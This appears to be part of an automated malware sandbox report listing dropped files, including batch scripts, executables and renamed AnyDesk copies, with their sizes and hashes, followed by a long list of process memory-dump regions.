198B

MD5
f3fbd4e6a0097ff2d729be2b6e494e80

SHA1
abed54083af60944e4628718061fa6b9ce402594

SHA256
b7d74a96173fd177dceead637138814738b68799b018437dbd4ba20213977e56

SHA512
f9a7f899cdc423a3214072de0a2858f212e15d9055b22cbb8536d20cea3fe199e3f44f3183c6d3e41e85a04b2b47e0497ead13eeb49e67f91e44cb19fe4a0f57

Download Submit
C:\windows\tasks\run.bat

Filesize
338B

MD5
20a377ca25c7fcdff75b3720ba83e11c

SHA1
ad3ceb92df33714c7d3f517a77b1086797d72c47

SHA256
280e5ccacd1622f61cfd675f4ae1204790bd5aea648d0e51145d01a772d792ad

SHA512
b4f2d5a1c8cbdfd7cc3f6d106735e816572bb0a177b302263fa9267625bca7d77f49b5e86252c3632ce9e05e4e5ba7730e7555ac465ed5b46f913de4739cecc6

Download Submit
\??\c:\programdata\migrate.exe

Filesize
6.6MB

MD5
4d877cab8a19afea517ba4436805ce77

SHA1
7210160bd527a3b726ad0686613bff358823de41

SHA256
e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d

SHA512
af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc

Download Submit
\??\c:\programdata\st.bat

Filesize
3KB

MD5
d7c8216954b5eb6037dd1a45dd57a4f0

SHA1
a7edc98e44c55070d28941bfc9f7d88a95576041

SHA256
cf5405b85d6f3e6365707af3302610d84596c23f0f7717c43eb11c1ac702bce7

SHA512
3338f2c096137b568cf1f3ac1ae6ab4be2b2baa7ed08aaa4b7fe6b72ddca231d456a3fa41c817b6dc14abc62c062a390a440b8a3fc6a1ab5243f7f4fc12f29af

Download Submit
\??\c:\programdata\wsappy.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
\ProgramData\1.exe

Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe

Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe

Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe

Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\AnyDesk\AnyDesk.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
\ProgramData\any.exe

Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
\ProgramData\any.exe

Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
\ProgramData\any.exe

Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
\ProgramData\dc.exe

Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
\ProgramData\dc.exe

Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
\ProgramData\dc.exe

Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
\ProgramData\migrate.exe

Filesize
6.6MB

MD5
4d877cab8a19afea517ba4436805ce77

SHA1
7210160bd527a3b726ad0686613bff358823de41

SHA256
e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d

SHA512
af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc

Download Submit
\ProgramData\wsappz.exe

Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
\runtimeMonitor\ComdriverSvc.exe

Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
\runtimeMonitor\ComdriverSvc.exe

Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
memory/380-163-0x0000000073350000-0x00000000738FB000-memory.dmp

Filesize
5.7MB

Download
memory/380-110-0x0000000000000000-mapping.dmp

Download
memory/380-118-0x0000000073350000-0x00000000738FB000-memory.dmp

Filesize
5.7MB

Download
memory/452-220-0x0000000000000000-mapping.dmp

Download
memory/520-67-0x0000000000000000-mapping.dmp

Download
memory/544-69-0x0000000000000000-mapping.dmp

Download
memory/604-244-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/604-162-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/604-173-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/624-159-0x0000000000000000-mapping.dmp

Download
memory/764-229-0x0000000000000000-mapping.dmp

Download
memory/892-95-0x0000000000000000-mapping.dmp

Download
memory/924-165-0x0000000000000000-mapping.dmp

Download
memory/952-158-0x0000000000000000-mapping.dmp

Download
memory/960-168-0x0000000000000000-mapping.dmp

Download
memory/972-59-0x0000000000000000-mapping.dmp

Download
memory/972-62-0x0000000073900000-0x0000000073EAB000-memory.dmp

Filesize
5.7MB

Download
memory/1072-256-0x0000000000000000-mapping.dmp

Download
memory/1084-75-0x0000000000000000-mapping.dmp

Download
memory/1168-161-0x0000000000030000-0x0000000001089000-memory.dmp

Filesize
16.3MB

Download
memory/1168-127-0x0000000000030000-0x0000000001089000-memory.dmp

Filesize
16.3MB

Download
memory/1168-116-0x0000000000000000-mapping.dmp

Download
memory/1284-120-0x0000000000000000-mapping.dmp

Download
memory/1336-58-0x0000000074360000-0x000000007490B000-memory.dmp

Filesize
5.7MB

Download
memory/1336-57-0x0000000074360000-0x000000007490B000-memory.dmp

Filesize
5.7MB

Download
memory/1336-55-0x0000000000000000-mapping.dmp

Download
memory/1352-104-0x0000000000000000-mapping.dmp

Download
memory/1364-94-0x0000000000000000-mapping.dmp

Download
memory/1364-232-0x0000000000000000-mapping.dmp

Download
memory/1452-103-0x0000000000000000-mapping.dmp

Download
memory/1484-177-0x00000000005A0000-0x00000000005B2000-memory.dmp

Filesize
72KB

Download
memory/1484-183-0x0000000000AA0000-0x0000000000AAC000-memory.dmp

Filesize
48KB

Download
memory/1484-174-0x0000000000330000-0x000000000034C000-memory.dmp

Filesize
112KB

Download
memory/1484-176-0x0000000000590000-0x0000000000598000-memory.dmp

Filesize
32KB

Download
memory/1484-178-0x0000000000960000-0x0000000000970000-memory.dmp

Filesize
64KB

Download
memory/1484-179-0x0000000000980000-0x000000000098C000-memory.dmp

Filesize
48KB

Download
memory/1484-180-0x0000000000990000-0x000000000099E000-memory.dmp

Filesize
56KB

Download
memory/1484-182-0x0000000000970000-0x000000000097E000-memory.dmp

Filesize
56KB

Download
memory/1484-181-0x00000000005B0000-0x00000000005B8000-memory.dmp

Filesize
32KB

Download
memory/1484-175-0x0000000000350000-0x0000000000366000-memory.dmp

Filesize
88KB

Download
memory/1484-125-0x0000000000000000-mapping.dmp

Download
memory/1484-129-0x00000000012A0000-0x00000000013AC000-memory.dmp

Filesize
1.0MB

Download
memory/1504-54-0x00000000768A1000-0x00000000768A3000-memory.dmp

Filesize
8KB

Download
memory/1536-137-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/1536-133-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/1536-233-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/1552-85-0x0000000000000000-mapping.dmp

Download
memory/1580-87-0x0000000000000000-mapping.dmp

Download
memory/1596-105-0x0000000000000000-mapping.dmp

Download
memory/1608-91-0x0000000000000000-mapping.dmp

Download
memory/1616-281-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/1616-298-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1648-92-0x0000000000000000-mapping.dmp

Download
memory/1716-107-0x0000000000000000-mapping.dmp

Download
memory/1736-222-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/1736-245-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/1736-214-0x0000000000000000-mapping.dmp

Download
memory/1784-99-0x0000000000000000-mapping.dmp

Download
memory/1800-77-0x0000000000000000-mapping.dmp

Download
memory/1808-148-0x0000000000000000-mapping.dmp

Download
memory/1812-167-0x0000000000000000-mapping.dmp

Download
memory/1812-100-0x0000000000000000-mapping.dmp

Download
memory/1844-113-0x0000000000000000-mapping.dmp

Download
memory/1884-219-0x0000000000000000-mapping.dmp

Download
memory/1956-108-0x0000000000000000-mapping.dmp

Download
memory/1960-156-0x0000000073350000-0x00000000738FB000-memory.dmp

Filesize
5.7MB

Download
memory/1960-149-0x0000000000000000-mapping.dmp

Download
memory/1972-147-0x0000000000000000-mapping.dmp

Download
memory/1996-98-0x0000000000000000-mapping.dmp

Download
memory/2088-246-0x0000000000000000-mapping.dmp

Download
memory/2192-252-0x0000000000000000-mapping.dmp

Download
memory/2260-213-0x0000000000000000-mapping.dmp

Download
memory/2260-224-0x00000000727F0000-0x0000000072D9B000-memory.dmp

Filesize
5.7MB

Download
memory/2260-231-0x00000000727F0000-0x0000000072D9B000-memory.dmp

Filesize
5.7MB

Download
memory/2304-257-0x0000000000000000-mapping.dmp

Download
memory/2308-217-0x0000000000000000-mapping.dmp

Download
memory/2400-259-0x0000000000000000-mapping.dmp

Download
memory/2400-280-0x0000000072240000-0x00000000727EB000-memory.dmp

Filesize
5.7MB

Download
memory/2400-261-0x0000000072240000-0x00000000727EB000-memory.dmp

Filesize
5.7MB

Download
memory/2460-223-0x0000000000000000-mapping.dmp

Download
memory/2488-226-0x0000000000000000-mapping.dmp

Download
memory/2552-227-0x0000000000000000-mapping.dmp

Download
memory/2560-272-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/2560-291-0x0000000001360000-0x00000000023B9000-memory.dmp

Filesize
16.3MB

Download
memory/2604-228-0x0000000000000000-mapping.dmp

Download
memory/2648-258-0x0000000000000000-mapping.dmp

Download
memory/2720-276-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/2720-208-0x000007FEEB340000-0x000007FEEBD63000-memory.dmp

Filesize
10.1MB

Download
memory/2720-184-0x0000000000000000-mapping.dmp

Download
memory/2720-293-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/2720-277-0x000007FEEA7E0000-0x000007FEEB33D000-memory.dmp

Filesize
11.4MB

Download
memory/2732-265-0x000007FEEA7E0000-0x000007FEEB33D000-memory.dmp

Filesize
11.4MB

Download
memory/2732-271-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/2732-289-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/2732-185-0x0000000000000000-mapping.dmp

Download
memory/2732-191-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

Filesize
8KB

Download
memory/2732-209-0x000007FEEB340000-0x000007FEEBD63000-memory.dmp

Filesize
10.1MB

Download
memory/2744-186-0x0000000000000000-mapping.dmp

Download
memory/2744-290-0x0000000002814000-0x0000000002817000-memory.dmp

Filesize
12KB

Download
memory/2744-210-0x000007FEEB340000-0x000007FEEBD63000-memory.dmp

Filesize
10.1MB

Download
memory/2744-268-0x000007FEEA7E0000-0x000007FEEB33D000-memory.dmp

Filesize
11.4MB

Download
memory/2744-273-0x0000000002814000-0x0000000002817000-memory.dmp

Filesize
12KB

Download
memory/2772-187-0x0000000000000000-mapping.dmp

Download
memory/2812-188-0x0000000000000000-mapping.dmp

Download
memory/2812-230-0x000007FEEB340000-0x000007FEEBD63000-memory.dmp

Filesize
10.1MB

Download
memory/2812-275-0x0000000002984000-0x0000000002987000-memory.dmp

Filesize
12KB

Download
memory/2812-292-0x0000000002984000-0x0000000002987000-memory.dmp

Filesize
12KB

Download
memory/2812-267-0x000007FEEA7E0000-0x000007FEEB33D000-memory.dmp

Filesize
11.4MB

Download
memory/2824-286-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/2824-263-0x000007FEEA7E0000-0x000007FEEB33D000-memory.dmp

Filesize
11.4MB

Download
memory/2824-189-0x0000000000000000-mapping.dmp

Download
memory/2824-211-0x000007FEEB340000-0x000007FEEBD63000-memory.dmp

Filesize
10.1MB

Download
memory/2824-266-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/2852-190-0x0000000000000000-mapping.dmp

Download
memory/2860-253-0x0000000000000000-mapping.dmp

Download
memory/2868-249-0x0000000000000000-mapping.dmp

Download
memory/2892-192-0x0000000000000000-mapping.dmp

Download
memory/2892-234-0x000007FEEB340000-0x000007FEEBD63000-memory.dmp

Filesize
10.1MB

Download
memory/2892-287-0x0000000002704000-0x0000000002707000-memory.dmp

Filesize
12KB

Download
memory/2892-264-0x000007FEEA7E0000-0x000007FEEB33D000-memory.dmp

Filesize
11.4MB

Download
memory/2892-269-0x0000000002704000-0x0000000002707000-memory.dmp

Filesize
12KB

Download
memory/2904-193-0x0000000000000000-mapping.dmp

Download
memory/2928-196-0x0000000000000000-mapping.dmp

Download
memory/2956-197-0x0000000000000000-mapping.dmp

Download
memory/3052-255-0x0000000000000000-mapping.dmp

Download